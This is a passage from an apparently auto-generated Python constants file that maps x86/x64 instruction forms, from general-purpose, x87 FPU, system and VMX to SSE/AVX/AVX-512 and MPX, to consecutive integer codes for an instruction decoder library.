JG_REL8_64: int = 206
ADD_RM8_IMM8: int = 207
OR_RM8_IMM8: int = 208
ADC_RM8_IMM8: int = 209
SBB_RM8_IMM8: int = 210
AND_RM8_IMM8: int = 211
SUB_RM8_IMM8: int = 212
XOR_RM8_IMM8: int = 213
CMP_RM8_IMM8: int = 214
ADD_RM16_IMM16: int = 215
ADD_RM32_IMM32: int = 216
ADD_RM64_IMM32: int = 217
OR_RM16_IMM16: int = 218
OR_RM32_IMM32: int = 219
OR_RM64_IMM32: int = 220
ADC_RM16_IMM16: int = 221
ADC_RM32_IMM32: int = 222
ADC_RM64_IMM32: int = 223
SBB_RM16_IMM16: int = 224
SBB_RM32_IMM32: int = 225
SBB_RM64_IMM32: int = 226
AND_RM16_IMM16: int = 227
AND_RM32_IMM32: int = 228
AND_RM64_IMM32: int = 229
SUB_RM16_IMM16: int = 230
SUB_RM32_IMM32: int = 231
SUB_RM64_IMM32: int = 232
XOR_RM16_IMM16: int = 233
XOR_RM32_IMM32: int = 234
XOR_RM64_IMM32: int = 235
CMP_RM16_IMM16: int = 236
CMP_RM32_IMM32: int = 237
CMP_RM64_IMM32: int = 238
ADD_RM8_IMM8_82: int = 239
OR_RM8_IMM8_82: int = 240
ADC_RM8_IMM8_82: int = 241
SBB_RM8_IMM8_82: int = 242
AND_RM8_IMM8_82: int = 243
SUB_RM8_IMM8_82: int = 244
XOR_RM8_IMM8_82: int = 245
CMP_RM8_IMM8_82: int = 246
ADD_RM16_IMM8: int = 247
ADD_RM32_IMM8: int = 248
ADD_RM64_IMM8: int = 249
OR_RM16_IMM8: int = 250
OR_RM32_IMM8: int = 251
OR_RM64_IMM8: int = 252
ADC_RM16_IMM8: int = 253
ADC_RM32_IMM8: int = 254
ADC_RM64_IMM8: int = 255
SBB_RM16_IMM8: int = 256
SBB_RM32_IMM8: int = 257
SBB_RM64_IMM8: int = 258
AND_RM16_IMM8: int = 259
AND_RM32_IMM8: int = 260
AND_RM64_IMM8: int = 261
SUB_RM16_IMM8: int = 262
SUB_RM32_IMM8: int = 263
SUB_RM64_IMM8: int = 264
XOR_RM16_IMM8: int = 265
XOR_RM32_IMM8: int = 266
XOR_RM64_IMM8: int = 267
CMP_RM16_IMM8: int = 268
CMP_RM32_IMM8: int = 269
CMP_RM64_IMM8: int = 270
TEST_RM8_R8: int = 271
TEST_RM16_R16: int = 272
TEST_RM32_R32: int = 273
TEST_RM64_R64: int = 274
XCHG_RM8_R8: int = 275
XCHG_RM16_R16: int = 276
XCHG_RM32_R32: int = 277
XCHG_RM64_R64: int = 278
MOV_RM8_R8: int = 279
MOV_RM16_R16: int = 280
MOV_RM32_R32: int = 281
MOV_RM64_R64: int = 282
MOV_R8_RM8: int = 283
MOV_R16_RM16: int = 284
MOV_R32_RM32: int = 285
MOV_R64_RM64: int = 286
MOV_RM16_SREG: int = 287
MOV_R32M16_SREG: int = 288
MOV_R64M16_SREG: int = 289
LEA_R16_M: int = 290
LEA_R32_M: int = 291
LEA_R64_M: int = 292
MOV_SREG_RM16: int = 293
MOV_SREG_R32M16: int = 294
MOV_SREG_R64M16: int = 295
POP_RM16: int = 296
POP_RM32: int = 297
POP_RM64: int = 298
NOPW: int = 299
NOPD: int = 300
NOPQ: int = 301
XCHG_R16_AX: int = 302
XCHG_R32_EAX: int = 303
XCHG_R64_RAX: int = 304
PAUSE: int = 305
CBW: int = 306
CWDE: int = 307
CDQE: int = 308
CWD: int = 309
CDQ: int = 310
CQO: int = 311
CALL_PTR1616: int = 312
CALL_PTR1632: int = 313
WAIT: int = 314
PUSHFW: int = 315
PUSHFD: int = 316
PUSHFQ: int = 317
POPFW: int = 318
POPFD: int = 319
POPFQ: int = 320
SAHF: int = 321
LAHF: int = 322
MOV_AL_MOFFS8: int = 323
MOV_AX_MOFFS16: int = 324
MOV_EAX_MOFFS32: int = 325
MOV_RAX_MOFFS64: int = 326
MOV_MOFFS8_AL: int = 327
MOV_MOFFS16_AX: int = 328
MOV_MOFFS32_EAX: int = 329
MOV_MOFFS64_RAX: int = 330
MOVSB_M8_M8: int = 331
MOVSW_M16_M16: int = 332
MOVSD_M32_M32: int = 333
MOVSQ_M64_M64: int = 334
CMPSB_M8_M8: int = 335
CMPSW_M16_M16: int = 336
CMPSD_M32_M32: int = 337
CMPSQ_M64_M64: int = 338
TEST_AL_IMM8: int = 339
TEST_AX_IMM16: int = 340
TEST_EAX_IMM32: int = 341
TEST_RAX_IMM32: int = 342
STOSB_M8_AL: int = 343
STOSW_M16_AX: int = 344
STOSD_M32_EAX: int = 345
STOSQ_M64_RAX: int = 346
LODSB_AL_M8: int = 347
LODSW_AX_M16: int = 348
LODSD_EAX_M32: int = 349
LODSQ_RAX_M64: int = 350
SCASB_AL_M8: int = 351
SCASW_AX_M16: int = 352
SCASD_EAX_M32: int = 353
SCASQ_RAX_M64: int = 354
MOV_R8_IMM8: int = 355
MOV_R16_IMM16: int = 356
MOV_R32_IMM32: int = 357
MOV_R64_IMM64: int = 358
ROL_RM8_IMM8: int = 359
ROR_RM8_IMM8: int = 360
RCL_RM8_IMM8: int = 361
RCR_RM8_IMM8: int = 362
SHL_RM8_IMM8: int = 363
SHR_RM8_IMM8: int = 364
SAL_RM8_IMM8: int = 365
SAR_RM8_IMM8: int = 366
ROL_RM16_IMM8: int = 367
ROL_RM32_IMM8: int = 368
ROL_RM64_IMM8: int = 369
ROR_RM16_IMM8: int = 370
ROR_RM32_IMM8: int = 371
ROR_RM64_IMM8: int = 372
RCL_RM16_IMM8: int = 373
RCL_RM32_IMM8: int = 374
RCL_RM64_IMM8: int = 375
RCR_RM16_IMM8: int = 376
RCR_RM32_IMM8: int = 377
RCR_RM64_IMM8: int = 378
SHL_RM16_IMM8: int = 379
SHL_RM32_IMM8: int = 380
SHL_RM64_IMM8: int = 381
SHR_RM16_IMM8: int = 382
SHR_RM32_IMM8: int = 383
SHR_RM64_IMM8: int = 384
SAL_RM16_IMM8: int = 385
SAL_RM32_IMM8: int = 386
SAL_RM64_IMM8: int = 387
SAR_RM16_IMM8: int = 388
SAR_RM32_IMM8: int = 389
SAR_RM64_IMM8: int = 390
RETNW_IMM16: int = 391
RETND_IMM16: int = 392
RETNQ_IMM16: int = 393
RETNW: int = 394
RETND: int = 395
RETNQ: int = 396
LES_R16_M1616: int = 397
LES_R32_M1632: int = 398
LDS_R16_M1616: int = 399
LDS_R32_M1632: int = 400
MOV_RM8_IMM8: int = 401
XABORT_IMM8: int = 402
MOV_RM16_IMM16: int = 403
MOV_RM32_IMM32: int = 404
MOV_RM64_IMM32: int = 405
XBEGIN_REL16: int = 406
XBEGIN_REL32: int = 407
ENTERW_IMM16_IMM8: int = 408
ENTERD_IMM16_IMM8: int = 409
ENTERQ_IMM16_IMM8: int = 410
LEAVEW: int = 411
LEAVED: int = 412
LEAVEQ: int = 413
RETFW_IMM16: int = 414
RETFD_IMM16: int = 415
RETFQ_IMM16: int = 416
RETFW: int = 417
RETFD: int = 418
RETFQ: int = 419
INT3: int = 420
INT_IMM8: int = 421
INTO: int = 422
IRETW: int = 423
IRETD: int = 424
IRETQ: int = 425
ROL_RM8_1: int = 426
ROR_RM8_1: int = 427
RCL_RM8_1: int = 428
RCR_RM8_1: int = 429
SHL_RM8_1: int = 430
SHR_RM8_1: int = 431
SAL_RM8_1: int = 432
SAR_RM8_1: int = 433
ROL_RM16_1: int = 434
ROL_RM32_1: int = 435
ROL_RM64_1: int = 436
ROR_RM16_1: int = 437
ROR_RM32_1: int = 438
ROR_RM64_1: int = 439
RCL_RM16_1: int = 440
RCL_RM32_1: int = 441
RCL_RM64_1: int = 442
RCR_RM16_1: int = 443
RCR_RM32_1: int = 444
RCR_RM64_1: int = 445
SHL_RM16_1: int = 446
SHL_RM32_1: int = 447
SHL_RM64_1: int = 448
SHR_RM16_1: int = 449
SHR_RM32_1: int = 450
SHR_RM64_1: int = 451
SAL_RM16_1: int = 452
SAL_RM32_1: int = 453
SAL_RM64_1: int = 454
SAR_RM16_1: int = 455
SAR_RM32_1: int = 456
SAR_RM64_1: int = 457
ROL_RM8_CL: int = 458
ROR_RM8_CL: int = 459
RCL_RM8_CL: int = 460
RCR_RM8_CL: int = 461
SHL_RM8_CL: int = 462
SHR_RM8_CL: int = 463
SAL_RM8_CL: int = 464
SAR_RM8_CL: int = 465
ROL_RM16_CL: int = 466
ROL_RM32_CL: int = 467
ROL_RM64_CL: int = 468
ROR_RM16_CL: int = 469
ROR_RM32_CL: int = 470
ROR_RM64_CL: int = 471
RCL_RM16_CL: int = 472
RCL_RM32_CL: int = 473
RCL_RM64_CL: int = 474
RCR_RM16_CL: int = 475
RCR_RM32_CL: int = 476
RCR_RM64_CL: int = 477
SHL_RM16_CL: int = 478
SHL_RM32_CL: int = 479
SHL_RM64_CL: int = 480
SHR_RM16_CL: int = 481
SHR_RM32_CL: int = 482
SHR_RM64_CL: int = 483
SAL_RM16_CL: int = 484
SAL_RM32_CL: int = 485
SAL_RM64_CL: int = 486
SAR_RM16_CL: int = 487
SAR_RM32_CL: int = 488
SAR_RM64_CL: int = 489
AAM_IMM8: int = 490
AAD_IMM8: int = 491
SALC: int = 492
XLAT_M8: int = 493
FADD_M32FP: int = 494
FMUL_M32FP: int = 495
FCOM_M32FP: int = 496
FCOMP_M32FP: int = 497
FSUB_M32FP: int = 498
FSUBR_M32FP: int = 499
FDIV_M32FP: int = 500
FDIVR_M32FP: int = 501
FADD_ST0_STI: int = 502
FMUL_ST0_STI: int = 503
FCOM_ST0_STI: int = 504
FCOMP_ST0_STI: int = 505
FSUB_ST0_STI: int = 506
FSUBR_ST0_STI: int = 507
FDIV_ST0_STI: int = 508
FDIVR_ST0_STI: int = 509
FLD_M32FP: int = 510
FST_M32FP: int = 511
FSTP_M32FP: int = 512
FLDENV_M14BYTE: int = 513
FLDENV_M28BYTE: int = 514
FLDCW_M2BYTE: int = 515
FNSTENV_M14BYTE: int = 516
FSTENV_M14BYTE: int = 517
FNSTENV_M28BYTE: int = 518
FSTENV_M28BYTE: int = 519
FNSTCW_M2BYTE: int = 520
FSTCW_M2BYTE: int = 521
FLD_STI: int = 522
FXCH_ST0_STI: int = 523
FNOP: int = 524
FSTPNCE_STI: int = 525
FCHS: int = 526
FABS: int = 527
FTST: int = 528
FXAM: int = 529
FLD1: int = 530
FLDL2T: int = 531
FLDL2E: int = 532
FLDPI: int = 533
FLDLG2: int = 534
FLDLN2: int = 535
FLDZ: int = 536
F2XM1: int = 537
FYL2X: int = 538
FPTAN: int = 539
FPATAN: int = 540
FXTRACT: int = 541
FPREM1: int = 542
FDECSTP: int = 543
FINCSTP: int = 544
FPREM: int = 545
FYL2XP1: int = 546
FSQRT: int = 547
FSINCOS: int = 548
FRNDINT: int = 549
FSCALE: int = 550
FSIN: int = 551
FCOS: int = 552
FIADD_M32INT: int = 553
FIMUL_M32INT: int = 554
FICOM_M32INT: int = 555
FICOMP_M32INT: int = 556
FISUB_M32INT: int = 557
FISUBR_M32INT: int = 558
FIDIV_M32INT: int = 559
FIDIVR_M32INT: int = 560
FCMOVB_ST0_STI: int = 561
FCMOVE_ST0_STI: int = 562
FCMOVBE_ST0_STI: int = 563
FCMOVU_ST0_STI: int = 564
FUCOMPP: int = 565
FILD_M32INT: int = 566
FISTTP_M32INT: int = 567
FIST_M32INT: int = 568
FISTP_M32INT: int = 569
FLD_M80FP: int = 570
FSTP_M80FP: int = 571
FCMOVNB_ST0_STI: int = 572
FCMOVNE_ST0_STI: int = 573
FCMOVNBE_ST0_STI: int = 574
FCMOVNU_ST0_STI: int = 575
FNENI: int = 576
FENI: int = 577
FNDISI: int = 578
FDISI: int = 579
FNCLEX: int = 580
FCLEX: int = 581
FNINIT: int = 582
FINIT: int = 583
FNSETPM: int = 584
FSETPM: int = 585
FRSTPM: int = 586
FUCOMI_ST0_STI: int = 587
FCOMI_ST0_STI: int = 588
FADD_M64FP: int = 589
FMUL_M64FP: int = 590
FCOM_M64FP: int = 591
FCOMP_M64FP: int = 592
FSUB_M64FP: int = 593
FSUBR_M64FP: int = 594
FDIV_M64FP: int = 595
FDIVR_M64FP: int = 596
FADD_STI_ST0: int = 597
FMUL_STI_ST0: int = 598
FCOM_ST0_STI_DCD0: int = 599
FCOMP_ST0_STI_DCD8: int = 600
FSUBR_STI_ST0: int = 601
FSUB_STI_ST0: int = 602
FDIVR_STI_ST0: int = 603
FDIV_STI_ST0: int = 604
FLD_M64FP: int = 605
FISTTP_M64INT: int = 606
FST_M64FP: int = 607
FSTP_M64FP: int = 608
FRSTOR_M94BYTE: int = 609
FRSTOR_M108BYTE: int = 610
FNSAVE_M94BYTE: int = 611
FSAVE_M94BYTE: int = 612
FNSAVE_M108BYTE: int = 613
FSAVE_M108BYTE: int = 614
FNSTSW_M2BYTE: int = 615
FSTSW_M2BYTE: int = 616
FFREE_STI: int = 617
FXCH_ST0_STI_DDC8: int = 618
FST_STI: int = 619
FSTP_STI: int = 620
FUCOM_ST0_STI: int = 621
FUCOMP_ST0_STI: int = 622
FIADD_M16INT: int = 623
FIMUL_M16INT: int = 624
FICOM_M16INT: int = 625
FICOMP_M16INT: int = 626
FISUB_M16INT: int = 627
FISUBR_M16INT: int = 628
FIDIV_M16INT: int = 629
FIDIVR_M16INT: int = 630
FADDP_STI_ST0: int = 631
FMULP_STI_ST0: int = 632
FCOMP_ST0_STI_DED0: int = 633
FCOMPP: int = 634
FSUBRP_STI_ST0: int = 635
FSUBP_STI_ST0: int = 636
FDIVRP_STI_ST0: int = 637
FDIVP_STI_ST0: int = 638
FILD_M16INT: int = 639
FISTTP_M16INT: int = 640
FIST_M16INT: int = 641
FISTP_M16INT: int = 642
FBLD_M80BCD: int = 643
FILD_M64INT: int = 644
FBSTP_M80BCD: int = 645
FISTP_M64INT: int = 646
FFREEP_STI: int = 647
FXCH_ST0_STI_DFC8: int = 648
FSTP_STI_DFD0: int = 649
FSTP_STI_DFD8: int = 650
FNSTSW_AX: int = 651
FSTSW_AX: int = 652
FSTDW_AX: int = 653
FSTSG_AX: int = 654
FUCOMIP_ST0_STI: int = 655
FCOMIP_ST0_STI: int = 656
LOOPNE_REL8_16_CX: int = 657
LOOPNE_REL8_32_CX: int = 658
LOOPNE_REL8_16_ECX: int = 659
LOOPNE_REL8_32_ECX: int = 660
LOOPNE_REL8_64_ECX: int = 661
LOOPNE_REL8_16_RCX: int = 662
LOOPNE_REL8_64_RCX: int = 663
LOOPE_REL8_16_CX: int = 664
LOOPE_REL8_32_CX: int = 665
LOOPE_REL8_16_ECX: int = 666
LOOPE_REL8_32_ECX: int = 667
LOOPE_REL8_64_ECX: int = 668
LOOPE_REL8_16_RCX: int = 669
LOOPE_REL8_64_RCX: int = 670
LOOP_REL8_16_CX: int = 671
LOOP_REL8_32_CX: int = 672
LOOP_REL8_16_ECX: int = 673
LOOP_REL8_32_ECX: int = 674
LOOP_REL8_64_ECX: int = 675
LOOP_REL8_16_RCX: int = 676
LOOP_REL8_64_RCX: int = 677
JCXZ_REL8_16: int = 678
JCXZ_REL8_32: int = 679
JECXZ_REL8_16: int = 680
JECXZ_REL8_32: int = 681
JECXZ_REL8_64: int = 682
JRCXZ_REL8_16: int = 683
JRCXZ_REL8_64: int = 684
IN_AL_IMM8: int = 685
IN_AX_IMM8: int = 686
IN_EAX_IMM8: int = 687
OUT_IMM8_AL: int = 688
OUT_IMM8_AX: int = 689
OUT_IMM8_EAX: int = 690
CALL_REL16: int = 691
CALL_REL32_32: int = 692
CALL_REL32_64: int = 693
JMP_REL16: int = 694
JMP_REL32_32: int = 695
JMP_REL32_64: int = 696
JMP_PTR1616: int = 697
JMP_PTR1632: int = 698
JMP_REL8_16: int = 699
JMP_REL8_32: int = 700
JMP_REL8_64: int = 701
IN_AL_DX: int = 702
IN_AX_DX: int = 703
IN_EAX_DX: int = 704
OUT_DX_AL: int = 705
OUT_DX_AX: int = 706
OUT_DX_EAX: int = 707
INT1: int = 708
HLT: int = 709
CMC: int = 710
TEST_RM8_IMM8: int = 711
TEST_RM8_IMM8_F6R1: int = 712
NOT_RM8: int = 713
NEG_RM8: int = 714
MUL_RM8: int = 715
IMUL_RM8: int = 716
DIV_RM8: int = 717
IDIV_RM8: int = 718
TEST_RM16_IMM16: int = 719
TEST_RM32_IMM32: int = 720
TEST_RM64_IMM32: int = 721
TEST_RM16_IMM16_F7R1: int = 722
TEST_RM32_IMM32_F7R1: int = 723
TEST_RM64_IMM32_F7R1: int = 724
NOT_RM16: int = 725
NOT_RM32: int = 726
NOT_RM64: int = 727
NEG_RM16: int = 728
NEG_RM32: int = 729
NEG_RM64: int = 730
MUL_RM16: int = 731
MUL_RM32: int = 732
MUL_RM64: int = 733
IMUL_RM16: int = 734
IMUL_RM32: int = 735
IMUL_RM64: int = 736
DIV_RM16: int = 737
DIV_RM32: int = 738
DIV_RM64: int = 739
IDIV_RM16: int = 740
IDIV_RM32: int = 741
IDIV_RM64: int = 742
CLC: int = 743
STC: int = 744
CLI: int = 745
STI: int = 746
CLD: int = 747
STD: int = 748
INC_RM8: int = 749
DEC_RM8: int = 750
INC_RM16: int = 751
INC_RM32: int = 752
INC_RM64: int = 753
DEC_RM16: int = 754
DEC_RM32: int = 755
DEC_RM64: int = 756
CALL_RM16: int = 757
CALL_RM32: int = 758
CALL_RM64: int = 759
CALL_M1616: int = 760
CALL_M1632: int = 761
CALL_M1664: int = 762
JMP_RM16: int = 763
JMP_RM32: int = 764
JMP_RM64: int = 765
JMP_M1616: int = 766
JMP_M1632: int = 767
JMP_M1664: int = 768
PUSH_RM16: int = 769
PUSH_RM32: int = 770
PUSH_RM64: int = 771
SLDT_RM16: int = 772
SLDT_R32M16: int = 773
SLDT_R64M16: int = 774
STR_RM16: int = 775
STR_R32M16: int = 776
STR_R64M16: int = 777
LLDT_RM16: int = 778
LLDT_R32M16: int = 779
LLDT_R64M16: int = 780
LTR_RM16: int = 781
LTR_R32M16: int = 782
LTR_R64M16: int = 783
VERR_RM16: int = 784
VERR_R32M16: int = 785
VERR_R64M16: int = 786
VERW_RM16: int = 787
VERW_R32M16: int = 788
VERW_R64M16: int = 789
JMPE_RM16: int = 790
JMPE_RM32: int = 791
SGDT_M1632_16: int = 792
SGDT_M1632: int = 793
SGDT_M1664: int = 794
SIDT_M1632_16: int = 795
SIDT_M1632: int = 796
SIDT_M1664: int = 797
LGDT_M1632_16: int = 798
LGDT_M1632: int = 799
LGDT_M1664: int = 800
LIDT_M1632_16: int = 801
LIDT_M1632: int = 802
LIDT_M1664: int = 803
SMSW_RM16: int = 804
SMSW_R32M16: int = 805
SMSW_R64M16: int = 806
RSTORSSP_M64: int = 807
LMSW_RM16: int = 808
LMSW_R32M16: int = 809
LMSW_R64M16: int = 810
INVLPG_M: int = 811
ENCLV: int = 812
VMCALL: int = 813
VMLAUNCH: int = 814
VMRESUME: int = 815
VMXOFF: int = 816
PCONFIG: int = 817
MONITORW: int = 818
MONITORD: int = 819
MONITORQ: int = 820
MWAIT: int = 821
CLAC: int = 822
STAC: int = 823
ENCLS: int = 824
XGETBV: int = 825
XSETBV: int = 826
VMFUNC: int = 827
XEND: int = 828
XTEST: int = 829
ENCLU: int = 830
VMRUNW: int = 831
VMRUND: int = 832
VMRUNQ: int = 833
VMMCALL: int = 834
VMLOADW: int = 835
VMLOADD: int = 836
VMLOADQ: int = 837
VMSAVEW: int = 838
VMSAVED: int = 839
VMSAVEQ: int = 840
STGI: int = 841
CLGI: int = 842
SKINIT: int = 843
INVLPGAW: int = 844
INVLPGAD: int = 845
INVLPGAQ: int = 846
SETSSBSY: int = 847
SAVEPREVSSP: int = 848
RDPKRU: int = 849
WRPKRU: int = 850
SWAPGS: int = 851
RDTSCP: int = 852
MONITORXW: int = 853
MONITORXD: int = 854
MONITORXQ: int = 855
MCOMMIT: int = 856
MWAITX: int = 857
CLZEROW: int = 858
CLZEROD: int = 859
CLZEROQ: int = 860
RDPRU: int = 861
LAR_R16_RM16: int = 862
LAR_R32_R32M16: int = 863
LAR_R64_R64M16: int = 864
LSL_R16_RM16: int = 865
LSL_R32_R32M16: int = 866
LSL_R64_R64M16: int = 867
STOREALL: int = 868
LOADALL286: int = 869
SYSCALL: int = 870
CLTS: int = 871
LOADALL386: int = 872
SYSRETD: int = 873
SYSRETQ: int = 874
INVD: int = 875
WBINVD: int = 876
WBNOINVD: int = 877
CL1INVMB: int = 878
UD2: int = 879
RESERVEDNOP_RM16_R16_0F0D: int = 880
RESERVEDNOP_RM32_R32_0F0D: int = 881
RESERVEDNOP_RM64_R64_0F0D: int = 882
PREFETCH_M8: int = 883
PREFETCHW_M8: int = 884
PREFETCHWT1_M8: int = 885
FEMMS: int = 886
UMOV_RM8_R8: int = 887
UMOV_RM16_R16: int = 888
UMOV_RM32_R32: int = 889
UMOV_R8_RM8: int = 890
UMOV_R16_RM16: int = 891
UMOV_R32_RM32: int = 892
MOVUPS_XMM_XMMM128: int = 893
VEX_VMOVUPS_XMM_XMMM128: int = 894
VEX_VMOVUPS_YMM_YMMM256: int = 895
EVEX_VMOVUPS_XMM_K1Z_XMMM128: int = 896
EVEX_VMOVUPS_YMM_K1Z_YMMM256: int = 897
EVEX_VMOVUPS_ZMM_K1Z_ZMMM512: int = 898
MOVUPD_XMM_XMMM128: int = 899
VEX_VMOVUPD_XMM_XMMM128: int = 900
VEX_VMOVUPD_YMM_YMMM256: int = 901
EVEX_VMOVUPD_XMM_K1Z_XMMM128: int = 902
EVEX_VMOVUPD_YMM_K1Z_YMMM256: int = 903
EVEX_VMOVUPD_ZMM_K1Z_ZMMM512: int = 904
MOVSS_XMM_XMMM32: int = 905
VEX_VMOVSS_XMM_XMM_XMM: int = 906
VEX_VMOVSS_XMM_M32: int = 907
EVEX_VMOVSS_XMM_K1Z_XMM_XMM: int = 908
EVEX_VMOVSS_XMM_K1Z_M32: int = 909
MOVSD_XMM_XMMM64: int = 910
VEX_VMOVSD_XMM_XMM_XMM: int = 911
VEX_VMOVSD_XMM_M64: int = 912
EVEX_VMOVSD_XMM_K1Z_XMM_XMM: int = 913
EVEX_VMOVSD_XMM_K1Z_M64: int = 914
MOVUPS_XMMM128_XMM: int = 915
VEX_VMOVUPS_XMMM128_XMM: int = 916
VEX_VMOVUPS_YMMM256_YMM: int = 917
EVEX_VMOVUPS_XMMM128_K1Z_XMM: int = 918
EVEX_VMOVUPS_YMMM256_K1Z_YMM: int = 919
EVEX_VMOVUPS_ZMMM512_K1Z_ZMM: int = 920
MOVUPD_XMMM128_XMM: int = 921
VEX_VMOVUPD_XMMM128_XMM: int = 922
VEX_VMOVUPD_YMMM256_YMM: int = 923
EVEX_VMOVUPD_XMMM128_K1Z_XMM: int = 924
EVEX_VMOVUPD_YMMM256_K1Z_YMM: int = 925
EVEX_VMOVUPD_ZMMM512_K1Z_ZMM: int = 926
MOVSS_XMMM32_XMM: int = 927
VEX_VMOVSS_XMM_XMM_XMM_0F11: int = 928
VEX_VMOVSS_M32_XMM: int = 929
EVEX_VMOVSS_XMM_K1Z_XMM_XMM_0F11: int = 930
EVEX_VMOVSS_M32_K1_XMM: int = 931
MOVSD_XMMM64_XMM: int = 932
VEX_VMOVSD_XMM_XMM_XMM_0F11: int = 933
VEX_VMOVSD_M64_XMM: int = 934
EVEX_VMOVSD_XMM_K1Z_XMM_XMM_0F11: int = 935
EVEX_VMOVSD_M64_K1_XMM: int = 936
MOVHLPS_XMM_XMM: int = 937
MOVLPS_XMM_M64: int = 938
VEX_VMOVHLPS_XMM_XMM_XMM: int = 939
VEX_VMOVLPS_XMM_XMM_M64: int = 940
EVEX_VMOVHLPS_XMM_XMM_XMM: int = 941
EVEX_VMOVLPS_XMM_XMM_M64: int = 942
MOVLPD_XMM_M64: int = 943
VEX_VMOVLPD_XMM_XMM_M64: int = 944
EVEX_VMOVLPD_XMM_XMM_M64: int = 945
MOVSLDUP_XMM_XMMM128: int = 946
VEX_VMOVSLDUP_XMM_XMMM128: int = 947
VEX_VMOVSLDUP_YMM_YMMM256: int = 948
EVEX_VMOVSLDUP_XMM_K1Z_XMMM128: int = 949
EVEX_VMOVSLDUP_YMM_K1Z_YMMM256: int = 950
EVEX_VMOVSLDUP_ZMM_K1Z_ZMMM512: int = 951
MOVDDUP_XMM_XMMM64: int = 952
VEX_VMOVDDUP_XMM_XMMM64: int = 953
VEX_VMOVDDUP_YMM_YMMM256: int = 954
EVEX_VMOVDDUP_XMM_K1Z_XMMM64: int = 955
EVEX_VMOVDDUP_YMM_K1Z_YMMM256: int = 956
EVEX_VMOVDDUP_ZMM_K1Z_ZMMM512: int = 957
MOVLPS_M64_XMM: int = 958
VEX_VMOVLPS_M64_XMM: int = 959
EVEX_VMOVLPS_M64_XMM: int = 960
MOVLPD_M64_XMM: int = 961
VEX_VMOVLPD_M64_XMM: int = 962
EVEX_VMOVLPD_M64_XMM: int = 963
UNPCKLPS_XMM_XMMM128: int = 964
VEX_VUNPCKLPS_XMM_XMM_XMMM128: int = 965
VEX_VUNPCKLPS_YMM_YMM_YMMM256: int = 966
EVEX_VUNPCKLPS_XMM_K1Z_XMM_XMMM128B32: int = 967
EVEX_VUNPCKLPS_YMM_K1Z_YMM_YMMM256B32: int = 968
EVEX_VUNPCKLPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 969
UNPCKLPD_XMM_XMMM128: int = 970
VEX_VUNPCKLPD_XMM_XMM_XMMM128: int = 971
VEX_VUNPCKLPD_YMM_YMM_YMMM256: int = 972
EVEX_VUNPCKLPD_XMM_K1Z_XMM_XMMM128B64: int = 973
EVEX_VUNPCKLPD_YMM_K1Z_YMM_YMMM256B64: int = 974
EVEX_VUNPCKLPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 975
UNPCKHPS_XMM_XMMM128: int = 976
VEX_VUNPCKHPS_XMM_XMM_XMMM128: int = 977
VEX_VUNPCKHPS_YMM_YMM_YMMM256: int = 978
EVEX_VUNPCKHPS_XMM_K1Z_XMM_XMMM128B32: int = 979
EVEX_VUNPCKHPS_YMM_K1Z_YMM_YMMM256B32: int = 980
EVEX_VUNPCKHPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 981
UNPCKHPD_XMM_XMMM128: int = 982
VEX_VUNPCKHPD_XMM_XMM_XMMM128: int = 983
VEX_VUNPCKHPD_YMM_YMM_YMMM256: int = 984
EVEX_VUNPCKHPD_XMM_K1Z_XMM_XMMM128B64: int = 985
EVEX_VUNPCKHPD_YMM_K1Z_YMM_YMMM256B64: int = 986
EVEX_VUNPCKHPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 987
MOVLHPS_XMM_XMM: int = 988
VEX_VMOVLHPS_XMM_XMM_XMM: int = 989
EVEX_VMOVLHPS_XMM_XMM_XMM: int = 990
MOVHPS_XMM_M64: int = 991
VEX_VMOVHPS_XMM_XMM_M64: int = 992
EVEX_VMOVHPS_XMM_XMM_M64: int = 993
MOVHPD_XMM_M64: int = 994
VEX_VMOVHPD_XMM_XMM_M64: int = 995
EVEX_VMOVHPD_XMM_XMM_M64: int = 996
MOVSHDUP_XMM_XMMM128: int = 997
VEX_VMOVSHDUP_XMM_XMMM128: int = 998
VEX_VMOVSHDUP_YMM_YMMM256: int = 999
EVEX_VMOVSHDUP_XMM_K1Z_XMMM128: int = 1000
EVEX_VMOVSHDUP_YMM_K1Z_YMMM256: int = 1001
EVEX_VMOVSHDUP_ZMM_K1Z_ZMMM512: int = 1002
MOVHPS_M64_XMM: int = 1003
VEX_VMOVHPS_M64_XMM: int = 1004
EVEX_VMOVHPS_M64_XMM: int = 1005
MOVHPD_M64_XMM: int = 1006
VEX_VMOVHPD_M64_XMM: int = 1007
EVEX_VMOVHPD_M64_XMM: int = 1008
RESERVEDNOP_RM16_R16_0F18: int = 1009
RESERVEDNOP_RM32_R32_0F18: int = 1010
RESERVEDNOP_RM64_R64_0F18: int = 1011
RESERVEDNOP_RM16_R16_0F19: int = 1012
RESERVEDNOP_RM32_R32_0F19: int = 1013
RESERVEDNOP_RM64_R64_0F19: int = 1014
RESERVEDNOP_RM16_R16_0F1A: int = 1015
RESERVEDNOP_RM32_R32_0F1A: int = 1016
RESERVEDNOP_RM64_R64_0F1A: int = 1017
RESERVEDNOP_RM16_R16_0F1B: int = 1018
RESERVEDNOP_RM32_R32_0F1B: int = 1019
RESERVEDNOP_RM64_R64_0F1B: int = 1020
RESERVEDNOP_RM16_R16_0F1C: int = 1021
RESERVEDNOP_RM32_R32_0F1C: int = 1022
RESERVEDNOP_RM64_R64_0F1C: int = 1023
RESERVEDNOP_RM16_R16_0F1D: int = 1024
RESERVEDNOP_RM32_R32_0F1D: int = 1025
RESERVEDNOP_RM64_R64_0F1D: int = 1026
RESERVEDNOP_RM16_R16_0F1E: int = 1027
RESERVEDNOP_RM32_R32_0F1E: int = 1028
RESERVEDNOP_RM64_R64_0F1E: int = 1029
RESERVEDNOP_RM16_R16_0F1F: int = 1030
RESERVEDNOP_RM32_R32_0F1F: int = 1031
RESERVEDNOP_RM64_R64_0F1F: int = 1032
PREFETCHNTA_M8: int = 1033
PREFETCHT0_M8: int = 1034
PREFETCHT1_M8: int = 1035
PREFETCHT2_M8: int = 1036
BNDLDX_BND_MIB: int = 1037
BNDMOV_BND_BNDM64: int = 1038
BNDMOV_BND_BNDM128: int = 1039
BNDCL_BND_RM32: int = 1040
BNDCL_BND_RM64: int = 1041
BNDCU_BND_RM32: int = 1042
BNDCU_BND_RM64: int = 1043
BNDSTX_MIB_BND: int = 1044
BNDMOV_BNDM64_BND: int = 1045
BNDMOV_BNDM128_BND: int = 1046
BNDMK_BND_M32: int = 1047
BNDMK_BND_M64: int = 1048
BNDCN_BND_RM32: int = 1049
BNDCN_BND_RM64: int = 1050
